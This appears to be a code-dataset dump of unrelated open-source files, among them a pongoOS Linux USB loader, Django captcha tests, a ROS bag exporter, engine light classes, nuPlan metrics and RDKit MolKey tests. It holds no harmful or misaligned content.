max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
scripts/load_linux.py | checkra1n/PongoKit | 114 | 11086045 | <filename>scripts/load_linux.py<gh_stars>100-1000
#!/usr/bin/env python3
import usb.core
import struct
import sys
import argparse
import time
parser = argparse.ArgumentParser(description='A little Linux kernel/initrd uploader for pongoOS.')
parser.add_argument('-k', '--kernel', dest='kernel', help='path to kernel image')
parser.add_argument('-d', '--dtbpack', dest='dtbpack', help='path to dtbpack')
parser.add_argument('-r', '--initrd', dest='initrd', help='path to initial ramdisk')
parser.add_argument('-c', '--cmdline', dest='cmdline', help='custom kernel command line')
args = parser.parse_args()
if args.kernel is None:
print(f"error: No kernel specified! Run `{sys.argv[0]} --help` for usage.")
exit(1)
if args.dtbpack is None:
print(f"error: No dtbpack specified! Run `{sys.argv[0]} --help` for usage.")
exit(1)
dev = usb.core.find(idVendor=0x05ac, idProduct=0x4141)
if dev is None:
print("Waiting for device...")
while dev is None:
dev = usb.core.find(idVendor=0x05ac, idProduct=0x4141)
if dev is not None:
dev.set_configuration()
break
time.sleep(2)
else:
dev.set_configuration()
kernel = open(args.kernel, "rb").read()
fdt = open(args.dtbpack, "rb").read()
if args.cmdline is not None:
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
dev.ctrl_transfer(0x21, 3, 0, 0, f"linux_cmdline {args.cmdline}\n")
if args.initrd is not None:
print("Loading initial ramdisk...")
initrd = open(args.initrd, "rb").read()
initrd_size = len(initrd)
dev.ctrl_transfer(0x21, 2, 0, 0, 0)
dev.ctrl_transfer(0x21, 1, 0, 0, struct.pack('I', initrd_size))
dev.write(2, initrd, 1000000)
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
dev.ctrl_transfer(0x21, 3, 0, 0, "ramdisk\n")
print("Initial ramdisk loaded successfully.")
print("Loading device tree...")
dev.ctrl_transfer(0x21, 2, 0, 0, 0)
dev.ctrl_transfer(0x21, 1, 0, 0, 0)
dev.write(2, fdt)
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
dev.ctrl_transfer(0x21, 3, 0, 0, "fdt\n")
print("Device tree loaded successfully.")
print("Loading kernel...")
kernel_size = len(kernel)
dev.ctrl_transfer(0x21, 2, 0, 0, 0)
dev.ctrl_transfer(0x21, 1, 0, 0, struct.pack('I', kernel_size))
dev.write(2, kernel, 1000000)
print("Kernel loaded successfully.")
dev.ctrl_transfer(0x21, 4, 0, 0, 0)
print("Booting...")
try:
dev.ctrl_transfer(0x21, 3, 0, 0, "bootl\n")
except:
# if the device disconnects without acknowledging it usually means it succeeded
print("Success.")
|
securityheaders/checkers/cors/allowcredentials/__init__.py | th3cyb3rc0p/securityheaders | 151 | 11086055 | <reponame>th3cyb3rc0p/securityheaders
from .checker import AccessControlAllowCredentialsChecker
__all__ = ['AccessControlAllowCredentialsChecker']
|
proplot/internals/context.py | lukelbd/panplot | 633 | 11086056 | <reponame>lukelbd/panplot<gh_stars>100-1000
#!/usr/bin/env python3
"""
Utilities for manging context.
"""
from . import ic # noqa: F401
class _empty_context(object):
"""
A dummy context manager.
"""
def __init__(self):
pass
def __enter__(self):
pass
def __exit__(self, *args): # noqa: U100
pass
class _state_context(object):
"""
Temporarily modify attribute(s) for an arbitrary object.
"""
def __init__(self, obj, **kwargs):
self._obj = obj
self._attrs_new = kwargs
self._attrs_prev = {
key: getattr(obj, key) for key in kwargs if hasattr(obj, key)
}
def __enter__(self):
for key, value in self._attrs_new.items():
setattr(self._obj, key, value)
def __exit__(self, *args): # noqa: U100
for key in self._attrs_new.keys():
if key in self._attrs_prev:
setattr(self._obj, key, self._attrs_prev[key])
else:
delattr(self._obj, key)
|
captcha/tests/__init__.py | shaoyh/django-simple-captcha | 108 | 11086065 | # -*- coding: utf-8 -*-
from captcha.conf import settings
from captcha.models import CaptchaStore
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
import datetime
class CaptchaCase(TestCase):
urls = 'captcha.tests.urls'
def setUp(self):
self.default_challenge = settings.get_challenge()()
self.math_challenge = settings._callable_from_string('captcha.helpers.math_challenge')()
self.chars_challenge = settings._callable_from_string('captcha.helpers.random_char_challenge')()
self.unicode_challenge = settings._callable_from_string('captcha.helpers.unicode_challenge')()
self.default_store, created = CaptchaStore.objects.get_or_create(challenge=self.default_challenge[0],response=self.default_challenge[1])
self.math_store, created = CaptchaStore.objects.get_or_create(challenge=self.math_challenge[0],response=self.math_challenge[1])
self.chars_store, created = CaptchaStore.objects.get_or_create(challenge=self.chars_challenge[0],response=self.chars_challenge[1])
self.unicode_store, created = CaptchaStore.objects.get_or_create(challenge=self.unicode_challenge[0],response=self.unicode_challenge[1])
def testImages(self):
for key in (self.math_store.hashkey, self.chars_store.hashkey, self.default_store.hashkey, self.unicode_store.hashkey):
response = self.client.get(reverse('captcha-image',kwargs=dict(key=key)))
self.failUnlessEqual(response.status_code, 200)
self.assertTrue(response.has_header('content-type'))
self.assertEquals(response._headers.get('content-type'), ('Content-Type', 'image/png'))
def testAudio(self):
if not settings.CAPTCHA_FLITE_PATH:
return
for key in (self.math_store.hashkey, self.chars_store.hashkey, self.default_store.hashkey, self.unicode_store.hashkey):
response = self.client.get(reverse('captcha-audio',kwargs=dict(key=key)))
self.failUnlessEqual(response.status_code, 200)
self.assertTrue(len(response.content) > 1024)
self.assertTrue(response.has_header('content-type'))
self.assertEquals(response._headers.get('content-type'), ('Content-Type', 'audio/x-wav'))
def testFormSubmit(self):
r = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r.status_code, 200)
hash_ = r.content[r.content.find('value="')+7:r.content.find('value="')+47]
try:
response = CaptchaStore.objects.get(hashkey=hash_).response
except:
self.fail()
r = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_,captcha_1=response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r.status_code, 200)
self.assertTrue(r.content.find('Form validated') > 0)
r = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_,captcha_1=response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r.status_code, 200)
self.assertFalse(r.content.find('Form validated') > 0)
def testWrongSubmit(self):
r = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r.status_code, 200)
r = self.client.post(reverse('captcha-test'), dict(captcha_0='abc',captcha_1='wrong response', subject='xxx', sender='<EMAIL>'))
self.assertFormError(r,'form','captcha',_('Invalid CAPTCHA'))
def testDeleteExpired(self):
self.default_store.expiration = datetime.datetime.now() - datetime.timedelta(minutes=5)
self.default_store.save()
hash_ = self.default_store.hashkey
r = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_,captcha_1=self.default_store.response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r.status_code, 200)
self.assertFalse(r.content.find('Form validated') > 0)
# expired -> deleted
try:
CaptchaStore.objects.get(hashkey=hash_)
self.fail()
except:
pass
def testCustomErrorMessage(self):
r = self.client.get(reverse('captcha-test-custom-error-message'))
self.failUnlessEqual(r.status_code, 200)
# Wrong answer
r = self.client.post(reverse('captcha-test-custom-error-message'), dict(captcha_0='abc',captcha_1='wrong response'))
self.assertFormError(r,'form','captcha','TEST CUSTOM ERROR MESSAGE')
# empty answer
r = self.client.post(reverse('captcha-test-custom-error-message'), dict(captcha_0='abc',captcha_1=''))
self.assertFormError(r,'form','captcha',_('This field is required.'))
def testRepeatedChallenge(self):
store = CaptchaStore.objects.create(challenge='xxx',response='xxx')
try:
store2 = CaptchaStore.objects.create(challenge='xxx',response='xxx')
except Exception:
self.fail()
def testRepeatedChallengeFormSubmit(self):
settings.CAPTCHA_CHALLENGE_FUNCT = 'captcha.tests.trivial_challenge'
r1 = self.client.get(reverse('captcha-test'))
r2 = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r1.status_code, 200)
self.failUnlessEqual(r2.status_code, 200)
hash_1 = r1.content[r1.content.find('value="')+7:r1.content.find('value="')+47]
hash_2 = r2.content[r2.content.find('value="')+7:r2.content.find('value="')+47]
try:
store_1 = CaptchaStore.objects.get(hashkey=hash_1)
store_2 = CaptchaStore.objects.get(hashkey=hash_2)
except:
self.fail()
self.assertTrue(store_1.pk != store_2.pk)
self.assertTrue(store_1.response == store_2.response)
self.assertTrue(hash_1 != hash_2)
r1 = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_1,captcha_1=store_1.response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r1.status_code, 200)
self.assertTrue(r1.content.find('Form validated') > 0)
try:
store_2 = CaptchaStore.objects.get(hashkey=hash_2)
except:
self.fail()
r2 = self.client.post(reverse('captcha-test'), dict(captcha_0=hash_2,captcha_1=store_2.response, subject='xxx', sender='<EMAIL>'))
self.failUnlessEqual(r2.status_code, 200)
self.assertTrue(r2.content.find('Form validated') > 0)
def testOutputFormat(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s<p>Hello, captcha world</p>%(hidden_field)s%(text_field)s'
r = self.client.get(reverse('captcha-test'))
self.failUnlessEqual(r.status_code, 200)
self.assertTrue('<p>Hello, captcha world</p>' in r.content)
def testInvalidOutputFormat(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s'
try:
r = self.client.get(reverse('captcha-test'))
self.fail()
except ImproperlyConfigured,e:
self.failUnless('CAPTCHA_OUTPUT_FORMAT' in unicode(e))
def testPerFormFormat(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s testCustomFormatString %(hidden_field)s %(text_field)s'
r = self.client.get(reverse('captcha-test'))
self.failUnless('testCustomFormatString' in r.content)
r = self.client.get(reverse('test_per_form_format'))
self.failUnless('testPerFieldCustomFormatString' in r.content)
def testIssue31ProperLabel(self):
settings.CAPTCHA_OUTPUT_FORMAT = u'%(image)s %(hidden_field)s %(text_field)s'
r = self.client.get(reverse('captcha-test'))
self.failUnless('<label for="id_captcha_1"' in r.content)
def trivial_challenge():
return 'trivial','trivial'
|
hand_eye_calibration/bin/bag_to_csv_with_config.py | Chatoyant19/handeye_calibration | 333 | 11086129 | <filename>hand_eye_calibration/bin/bag_to_csv_with_config.py
#!/usr/bin/env python
from subprocess import call
import argparse
import copy
import rospy
import yaml
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--yaml_config_file', required=True,
help='A yaml file specifying topics and frames.')
args = parser.parse_args()
tf_arguments = ["rosrun", "hand_eye_calibration", "tf_to_csv.py"]
te_arguments = ["rosrun", "hand_eye_calibration",
"target_extractor_interface.py"]
with open(args.yaml_config_file, 'r') as stream:
try:
yaml_content = yaml.load(stream)
except yaml.YAMLError as exc:
print(exc)
bags = yaml_content['bags']
for bag in bags:
bag_name = bag['name']
bag_name_without_suffix = bag_name.split('.')[0]
bag_path = bag['bag_path']
intrinsics_path = bag['intrinsics_path']
target_config_path = bag['target_config_path']
print("\n\nExporting poses from {}...\n".format(bag_name))
tf_frames = bag['tf_frames']
if tf_frames is None:
num_tf_source_frames = 0
num_tf_target_frames = 0
else:
num_tf_source_frames = len(tf_frames['source'])
num_tf_target_frames = len(tf_frames['target'])
assert num_tf_source_frames == num_tf_target_frames, "Source and target frames should have equal length."
for i in range(num_tf_source_frames):
tf_source_frame = tf_frames['source'][i]
tf_target_frame = tf_frames['target'][i]
print("Exporting poses of {} in {} frame".format(
tf_source_frame, tf_target_frame))
# Setup the args for tf_to_csv.py.
tf_call = copy.deepcopy(tf_arguments)
tf_call.append('--bag')
tf_call.append(bag_path + bag_name)
tf_call.append('--tf_source_frame')
tf_call.append(tf_source_frame)
tf_call.append('--tf_target_frame')
tf_call.append(tf_target_frame)
tf_call.append('--csv_output_file')
tf_call.append(bag_name_without_suffix + '_' +
tf_target_frame + '_' + tf_source_frame + '.csv')
call(tf_call)
cameras = bag['cameras']
equal_length_warning = ("Camera topics and intrinsic calibrations should "
"have equal length.")
if cameras is None:
num_camera_topics = 0
num_camera_intrinsics = 0
else:
num_camera_topics = len(cameras['cam_topics'])
num_camera_intrinsics = len(
cameras['cam_intrinsics'])
assert num_camera_topics == num_camera_intrinsics, equal_length_warning
target_config = bag['target']
for i in range(num_camera_topics):
camera_topic = cameras['cam_topics'][i]
camera_intrinsics = cameras['cam_intrinsics'][i]
print("Exporting {} poses in world (target) frame.".format(camera_topic))
# Setup the args for target_extractor_interface.py.
te_call = copy.deepcopy(te_arguments)
te_call.append('--bag')
te_call.append(bag_path + bag_name)
te_call.append('--image_topic')
te_call.append(camera_topic)
te_call.append('--calib_file_camera')
te_call.append(intrinsics_path + camera_intrinsics)
te_call.append('--calib_file_target')
te_call.append(target_config_path + target_config)
te_call.append('--output_file')
te_call.append(bag_name_without_suffix + '_' +
'W_' + camera_topic.replace("/", "_")[1:] + '.csv')
call(te_call)
|
L1Trigger/Configuration/python/L1DummyConfig_cff.py | ckamtsikis/cmssw | 852 | 11086166 | <filename>L1Trigger/Configuration/python/L1DummyConfig_cff.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
# for backwards compatibility
from L1Trigger.Configuration.L1Trigger_FakeConditions_cff import *
|
gwd/eda/submission.py | kazakh-shai/kaggle-global-wheat-detection | 136 | 11086177 | <reponame>kazakh-shai/kaggle-global-wheat-detection
import argparse
import os
import os.path as osp
import cv2
import numpy as np
import pandas as pd
from tqdm import tqdm
from gwd.eda.visualization import draw_bounding_boxes_on_image
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--submission_path", default="/data/pseudo_universe_submission.csv")
parser.add_argument("--img_root", default="/data/test")
parser.add_argument("--output_root", default="/data/eda")
return parser.parse_args()
def convert_bboxes(bboxes):
bboxes = np.concatenate([bboxes[:, 1:], bboxes[:, :1]], axis=1)
bboxes[:, 2] += bboxes[:, 0]
bboxes[:, 3] += bboxes[:, 1]
return bboxes
def main():
args = parse_args()
os.makedirs(args.output_root, exist_ok=True)
submission = pd.read_csv(args.submission_path)
for _, row in tqdm(submission.iterrows(), total=len(submission)):
image = cv2.imread(osp.join(args.img_root, f"{row.image_id}.jpg"))
bboxes = convert_bboxes(np.array(list(map(float, row.PredictionString.split()))).reshape(-1, 5))
draw_bounding_boxes_on_image(image, bboxes, use_normalized_coordinates=False, thickness=5)
cv2.imwrite(osp.join(args.output_root, f"{row.image_id}.jpg"), image)
if __name__ == "__main__":
main()
|
tests/bytecode/mp-tests/fun4.py | LabAixBidouille/micropython | 303 | 11086195 | def f(a, b=1, *c, d):
pass
#print(a,b,c,d) # bug in uPy!
f = lambda a, b, *c, d: None # default arg
#f = lambda a, b=1, *c, d: None # default arg for lambda not implemented
|
PyEngine3D/Render/Light.py | ubuntunux/PyEngine3D | 121 | 11086216 | <reponame>ubuntunux/PyEngine3D
import numpy as np
from PyEngine3D.Utilities import *
from PyEngine3D.Common import logger
from PyEngine3D.Common.Constants import *
from PyEngine3D.App import CoreManager
from .Actor import StaticActor
class MainLight(StaticActor):
def __init__(self, name, **object_data):
StaticActor.__init__(self, name, **object_data)
self.light_color = Float4(*object_data.get('light_color', (1.0, 1.0, 1.0, 1.0)))
self.transform.set_rotation(object_data.get('rot', [-1.0, 0, 0]))
self.last_shadow_camera = None
self.last_shadow_position = FLOAT3_ZERO.copy()
self.shadow_samples = object_data.get('shadow_samples', SHADOW_SAMPLES)
self.shadow_exp = object_data.get('shadow_exp', SHADOW_EXP)
self.shadow_bias = object_data.get('shadow_bias', SHADOW_BIAS)
self.shadow_width = object_data.get('shadow_width', SHADOW_DISTANCE)
self.shadow_height = object_data.get('shadow_height', SHADOW_DISTANCE)
self.shadow_depth = object_data.get('shadow_depth', SHADOW_DISTANCE)
self.shadow_orthogonal = Matrix4()
self.shadow_view_projection = Matrix4()
self.changed = False
self.update_shadow_orthogonal()
def reset_changed(self):
self.changed = False
def update_shadow_orthogonal(self):
ortho(self.shadow_orthogonal,
-self.shadow_width, self.shadow_width,
-self.shadow_height, self.shadow_height,
-self.shadow_depth, self.shadow_depth)
self.changed = True
def get_attribute(self):
super().get_attribute()
self.attributes.set_attribute('light_color', self.light_color)
self.attributes.set_attribute('shadow_width', self.shadow_width)
self.attributes.set_attribute('shadow_height', self.shadow_height)
self.attributes.set_attribute('shadow_depth', self.shadow_depth)
self.attributes.set_attribute('shadow_exp', self.shadow_exp)
self.attributes.set_attribute('shadow_bias', self.shadow_bias)
self.attributes.set_attribute('shadow_samples', self.shadow_samples)
return self.attributes
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
if 'light_color' == attribute_name:
self.light_color[...] = attribute_value
self.changed = True
elif attribute_name in ('shadow_width', 'shadow_height', 'shadow_depth'):
setattr(self, attribute_name, attribute_value)
self.update_shadow_orthogonal()
else:
super().set_attribute(attribute_name, attribute_value, item_info_history, attribute_index)
def get_save_data(self):
save_data = StaticActor.get_save_data(self)
save_data['light_color'] = self.light_color.tolist()
save_data['shadow_width'] = self.shadow_width
save_data['shadow_height'] = self.shadow_height
save_data['shadow_depth'] = self.shadow_depth
save_data['shadow_exp'] = self.shadow_exp
save_data['shadow_bias'] = self.shadow_bias
save_data['shadow_samples'] = self.shadow_samples
return save_data
def update(self, current_camera):
changed = self.transform.update_transform(update_inverse_matrix=True)
self.changed = self.changed or changed
if current_camera is not None:
camera_pos = current_camera.transform.get_pos()
self.last_shadow_camera = current_camera
self.last_shadow_position[...] = camera_pos
set_translate_matrix(self.shadow_view_projection, *(-camera_pos))
self.shadow_view_projection[...] = np.dot(np.dot(self.shadow_view_projection, self.transform.inverse_matrix), self.shadow_orthogonal)
class PointLight(StaticActor):
def __init__(self, name, **object_data):
StaticActor.__init__(self, name, **object_data)
self.light_color = Float3(*object_data.get('light_color', (1.0, 1.0, 1.0)))
self.light_radius = object_data.get('light_radius', 10.0)
def get_attribute(self):
super().get_attribute()
self.attributes.set_attribute('light_color', self.light_color)
self.attributes.set_attribute('light_radius', self.light_radius)
return self.attributes
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
super().set_attribute(attribute_name, attribute_value, item_info_history, attribute_index)
if attribute_name == 'light_color':
self.light_color[:] = attribute_value[:]
elif hasattr(self, attribute_name):
setattr(self, attribute_name, attribute_value)
def get_save_data(self):
save_data = StaticActor.get_save_data(self)
save_data['light_color'] = self.light_color.tolist()
save_data['light_radius'] = self.light_radius
return save_data
def update(self):
self.transform.update_transform()
|
packages/Python/lldbsuite/test/lang/swift/playgrounds-repl/two_valid_inputs/TestTwoValidInputs.py | xiaobai/swift-lldb | 765 | 11086228 | # TestTwoValidBlocks.py
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ------------------------------------------------------------------------------
"""
Test that statements made in one block can be referenced in a proceeding block
"""
import lldbsuite.test.lldbplaygroundrepl as repl
from lldbsuite.test.lldbtest import *
class TestTwoValidInputs(repl.PlaygroundREPLTest):
mydir = repl.PlaygroundREPLTest.compute_mydir(__file__)
def do_test(self):
"""
Test that statements made in one block can be referenced in a
proceeding block
"""
# Execute first block
result, output = self.execute_code("Input1.swift")
playground_output = output.GetSummary()
if self.is_compile_or_runtime_error(result):
self.did_crash(result)
self.assertTrue(False)
self.assertTrue(playground_output is not None)
self.assertTrue("a=\\'3\\'" in playground_output)
self.assertTrue("b=\\'5\\'" in playground_output)
# Execute second block
result, output = self.execute_code("Input2.swift")
playground_output = output.GetSummary()
if self.is_compile_or_runtime_error(result):
self.did_crash(result)
self.assertTrue(False)
self.assertTrue(playground_output is not None)
self.assertTrue("=\\'8\\'" in playground_output) |
mmdet/utils/collect_env.py | Karybdis/mmdetection-mini | 834 | 11086232 | <filename>mmdet/utils/collect_env.py
from mmdet.cv_core.utils.env import collect_env as collect_base_env
def collect_env():
"""Collect the information of the running environments."""
env_info = collect_base_env()
return env_info
if __name__ == '__main__':
for name, val in collect_env().items():
print(f'{name}: {val}') |
nuplan/planning/metrics/evaluation_metrics/common/ego_jerk.py | motional/nuplan-devkit | 128 | 11086251 | from typing import List
from nuplan.planning.metrics.evaluation_metrics.base.within_bound_metric_base import WithinBoundMetricBase
from nuplan.planning.metrics.metric_result import MetricStatistics
from nuplan.planning.metrics.utils.state_extractors import extract_ego_jerk
from nuplan.planning.scenario_builder.abstract_scenario import AbstractScenario
from nuplan.planning.simulation.history.simulation_history import SimulationHistory
class EgoJerkStatistics(WithinBoundMetricBase):
"""Ego jerk metric."""
def __init__(self, name: str, category: str, max_abs_mag_jerk: float) -> None:
"""
Initializes the EgoProgressAlongExpertRouteStatistics class
:param name: Metric name
:param category: Metric category
:param max_abs_mag_jerk: Maximum threshold to define if absolute jerk is within bound.
"""
super().__init__(name=name, category=category)
self._max_abs_mag_jerk = max_abs_mag_jerk
def compute(self, history: SimulationHistory, scenario: AbstractScenario) -> List[MetricStatistics]:
"""
Returns the jerk metric
:param history: History from a simulation engine
:param scenario: Scenario running this metric
:return the estimated jerk metric.
"""
return self._compute_statistics( # type: ignore
history=history,
scenario=scenario,
statistic_unit_name='meters_per_second_cubed',
extract_function=extract_ego_jerk,
extract_function_params={'acceleration_coordinate': 'magnitude'},
max_within_bound_threshold=self._max_abs_mag_jerk,
)
|
comcrawl/core/__init__.py | akozlo/comcrawl | 118 | 11086254 | <reponame>akozlo/comcrawl
"""This module exports the core class of the package."""
from .index_client import IndexClient
|
tools/gen_label_video_source.py | Xlsean/X-Temporal | 492 | 11086282 | <reponame>Xlsean/X-Temporal
import os
from decord import VideoReader
from decord import cpu
if __name__ == '__main__':
root_dir = '' # video data root path
dataset_name = 'hmdb51'
with open(os.path.join('../datasets', dataset_name, 'category.txt')) as f:
lines = f.readlines()
categories = []
for line in lines:
line = line.rstrip()
categories.append(line)
dict_categories = {}
for i, category in enumerate(categories):
dict_categories[category] = i
filename_input = os.path.join('../datasets', dataset_name, 'vallist.txt')
filename_output = 'test_videofolder.txt'
with open(filename_input) as f:
lines = f.readlines()
videos = []
idx_categories = []
for line in lines:
line = line.rstrip()
videos.append(line)
label = line.split('/')[0]
idx_categories.append(dict_categories[label])
output = []
for i in range(len(videos)):
curVideo = videos[i]
curIDX = idx_categories[i]
video_file = os.path.join(root_dir, curVideo)
vr = VideoReader(os.path.join(root_dir, curVideo), ctx=cpu(0))
output.append('%s %d %d' % (curVideo, len(vr), curIDX))
print('%d/%d' % (i, len(vr)))
with open(filename_output, 'w') as f:
f.write('\n'.join(output))
|
rdkit/Chem/MolKey/UnitTestMolKey.py | kazuyaujihara/rdkit | 1,609 | 11086287 | <reponame>kazuyaujihara/rdkit
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
import doctest
import unittest
from rdkit.Chem import inchi
from rdkit.TestRunner import redirect_stderr
import io
if inchi.INCHI_AVAILABLE:
from rdkit.Chem.MolKey.InchiInfo import InchiInfo
try:
from rdkit.Avalon import pyAvalonTools
from rdkit.Chem.MolKey import MolKey
_testMolKey = True
except ImportError:
_testMolKey = False
def load_tests(loader, tests, ignore):
""" Add the Doctests from the module """
if _testMolKey:
tests.addTests(doctest.DocTestSuite(MolKey, optionflags=doctest.ELLIPSIS))
return tests
@unittest.skipUnless(_testMolKey, 'Avalon tools and Inchi required')
class TestMolKey(unittest.TestCase):
def test_GetKeyForCTAB(self):
f = io.StringIO()
with redirect_stderr(f):
res = MolKey.GetKeyForCTAB('IncorrectCTAB')
self.assertNotEqual(res.error, 0)
s = f.getvalue()
self.assertIn('WARNING:', s)
def test_CheckCTAB(self):
self.assertRaises(MolKey.BadMoleculeException, MolKey.CheckCTAB, None)
self.assertRaises(MolKey.BadMoleculeException, MolKey.CheckCTAB, '')
ok, _ = MolKey.CheckCTAB('CCincorrect', isSmiles=True)
self.assertEqual(ok, 1)
ok, _ = MolKey.CheckCTAB('NO_STRUCTURE', isSmiles=True)
self.assertEqual(ok, MolKey.ERROR_DICT['NULL_MOL'])
ok, ctab = MolKey.CheckCTAB('CC', isSmiles=True)
self.assertEqual(ok, 0)
ok, ctab2 = MolKey.CheckCTAB(ctab, isSmiles=False)
self.assertEqual(ok, 0)
self.assertEqual(ctab, ctab2)
def test_GetInchiForCTAB(self):
self.assertRaises(MolKey.BadMoleculeException, MolKey.GetInchiForCTAB, 'IncorrectCTAB')
def test_ErrorBitsToText(self):
errors = MolKey.ErrorBitsToText(3)
self.assertIn('BAD_MOLECULE', errors)
self.assertIn('ALIAS_CONVERSION_FAILED', errors)
for k, v in MolKey.ERROR_DICT.items():
errors = MolKey.ErrorBitsToText(v)
self.assertEqual(len(errors), 1)
self.assertIn(k, errors)
def test_get_chiral_identification_string(self):
cases = [((0, 0), 'S_ACHIR'), # No stereo centers
((0, 1), 'R_ONE'), # One undefined stereo centers
((0, 2), 'S_UNKN'), # More than one undefined stereo centers
((0, 3), 'S_UNKN'), # More than one undefined stereo centers
((1, 0), 'S_ABS'), # Fully defined stereo center
((2, 0), 'S_ABS'), # Fully defined stereo centers
((1, 1), 'S_PART'), # Partially defined stereo centers
((2, 1), 'S_PART'), # Partially defined stereo centers
]
for (nDefined, nUndefined), expected in cases:
self.assertEqual(MolKey._get_chiral_identification_string(nDefined, nUndefined), expected)
GUANINE = 'InChI=1S/C5H5N5O/c6-5-9-3-2(4(11)10-5)7-1-8-3/h1H0,(H4,6,7,8,9,10,11)'
# 'N=C(-O)N', '/FixedH /SUU'
UREA1 = 'InChI=1/CH4N2O/c2-1(3)4/h(H4,2,3,4)/f/h2,4H,3H2/b2-1?'
# 'NC(=O)N', '/FixedH /SUU'
UREA2 = 'InChI=1/CH4N2O/c2-1(3)4/h(H4,2,3,4)/f/h2-3H2'
TRITIATED_UREA = 'InChI=1S/CH4N2O/c2-1(3)4/h(H4,2,3,4)/i/hT3'
DEUTERATED_UREA = 'InChI=1S/CH4N2O/c2-1(3)4/h(H4,2,3,4)/i/hD2'
ACETIC_ACID = 'InChI=1S/C3H6O2/c1-2-3(4)5/h2H2,1H3,(H,4,5)'
ACETATE = 'InChI=1S/C3H6O2/c1-2-3(4)5/h2H2,1H3,(H,4,5)/p-1'
mobile1 = 'InChI=1S/C5H5N3O2/c6-4(9)3-1-7-2-8-5(3)10/h1-2H,(H2,6,9)(H,7,8,10)' # invented
mobile2 = 'InChI=1S/C7H10N4O/c1-4-2-5(3-6(8)12)11-7(9)10-4/h2H,3H2,1H3,(H2,8,12)(H2,9,10,11)'
# sp3 stereo
sugar1 = 'InChI=1S/C14H20O9/c1-6-11(20-7(2)15)12(21-8(3)16)13(22-9(4)17)14(19-6)23-10(5)18/h6,11-14H,1-5H3/t6-,11-,12+,13+,14?/m0/s1' # L-rhamnopyranose (source: chemspider)
sugar2 = 'InChI=1S/C12H20O6/c1-11(2)14-5-6(16-11)8-7(13)9-10(15-8)18-12(3,4)17-9/h6-10,13H,5H2,1-4H3/t6-,7-,8-,9-,10-/m1/s1' # MFCD00135634 (Diacetone-D-Glucose, souce: chemspider)
sp3_unk = 'InChI=1S/C12H21NO4/c1-8(2)10(12(15)16-3)13-11(14)9-5-4-6-17-7-9/h8-10H,4-7H2,1-3H3,(H,13,14)/t9?,10-/m0/s1' # derived from ChemSpider 34044335
@unittest.skipUnless(inchi.INCHI_AVAILABLE, 'Inchi required')
class TestInchiInfo(unittest.TestCase):
def doTest(self, inchi, numSp3=0, numUndefSp3=0, numMobileHGroups=0, layer='non-isotopic'):
ii = InchiInfo(inchi)
nSp3, nUndefSp3, _, _ = ii.get_sp3_stereo()['main'][layer]
self.assertEqual(nSp3, numSp3)
self.assertEqual(nUndefSp3, numUndefSp3)
nMobileHGroups, _ = ii.get_mobile_h()['main'][layer]
self.assertEqual(nMobileHGroups, numMobileHGroups)
def testGuanine(self):
self.doTest(GUANINE, 0, 0, 1)
def testTritiatedUrea(self):
self.doTest(TRITIATED_UREA, 0, 0, 1)
def testDeuteratedUrea(self):
self.doTest(DEUTERATED_UREA, 0, 0, 1)
def testAceticAcid(self):
self.doTest(ACETIC_ACID, 0, 0, 1)
def testAcetate(self):
self.doTest(ACETATE, 0, 0, 1)
def testMobile1(self):
self.doTest(mobile1, 0, 0, 2)
def testMobile2(self):
self.doTest(mobile2, 0, 0, 2)
# sp3 stereo
def testSugar1(self):
self.doTest(sugar1, 5, 1, 0)
def testSugar2(self):
self.doTest(sugar2, 5, 0, 0)
def testSP3_unk(self):
self.doTest(sp3_unk, 2, 1, 1)
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
upvote/gae/taskqueue/utils_test.py | iwikmai/upvote | 453 | 11086292 | <reponame>iwikmai/upvote<filename>upvote/gae/taskqueue/utils_test.py<gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for taskqueue_utils."""
from google.appengine.ext import deferred
from upvote.gae.lib.testing import basetest
from upvote.gae.taskqueue import utils
from upvote.shared import constants
class QueueSizeTest(basetest.UpvoteTestCase):
def testSuccess(self):
self.assertEqual(0, utils.QueueSize())
expected_size = 10
for _ in xrange(expected_size):
deferred.defer(dir)
self.assertEqual(expected_size, utils.QueueSize())
